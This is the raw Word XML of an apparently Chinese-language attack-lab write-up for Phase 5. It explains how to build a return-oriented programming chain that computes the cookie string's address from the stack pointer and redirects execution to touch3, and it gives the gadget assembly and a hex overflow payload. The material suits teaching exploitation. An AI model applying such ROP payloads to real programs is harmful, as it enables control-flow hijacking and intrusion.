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drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="1508484"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="" title="fig:" id="21" name="Picture"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="https://cdn.jsdelivr.net/gh/liyu6688/images@main/屏幕截图 2025-06-24 122033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8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6" w:name="phase-5"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Phase 5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该阶段要实现的效果和Phase</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">3一样，所以同样需要将%rdi内容修改为cookie字符串对应地址并跳到touch3函数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由于每次栈都是随机开辟，存入字符串的地址并不固定，所以不能直接把地址赋值给%rdi，而需要通过读取栈顶地址%rsp加上一定的偏移量来获得字符串地址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movl指令以寄存器作为目的时，会把该寄存器的高位4字节设置为0，即会损失高四字节的值。而栈顶地址经过gdb断点测试，都至少大于0x7ffffff00000：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所以ROP整体思路为：</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">1.将偏移量pop入%rax中</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">2.movl指令将偏移量以该顺序：%eax-&gt;%edx-&gt;%ecx-&gt;%esi移入%rsi中</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">3.movq指令将栈指针以该顺序：%rsp-&gt;%rax-&gt;%rdi移入%rdi中</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">4.lea指令计算字符串地址</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">5.计算结果%rax赋值给%rdi</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">6.调用touch3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所以汇编</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">pop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rax
</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">retq
</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">movl 		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eax</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">edx
</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">retq
</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">movl		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edx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">ecx
</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">retq
</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">movl 		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ecx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">esi
</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">retq
</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">movq 		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rsp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">rax
</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">retq
</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">movq 		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rax</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">rdi
</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">retq
</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">lea 		</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">rdi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">rsi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),%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">rax
</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">retq
</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">movq		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rax</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">rdi
</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">retq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构造payload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1000"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">
</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">
</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">
</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">	
</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">00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cc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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">00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fa </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">97</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> b9 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">59</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">00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c5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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">00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ec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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">00</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1000"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="1786072"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="" title="fig:" id="24" name="Picture"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="https://cdn.jsdelivr.net/gh/liyu6688/images@main/屏幕截图 2025-06-24 121647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6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</w:p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2025-06-24T04:30:11Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-06-24T04:30:11Z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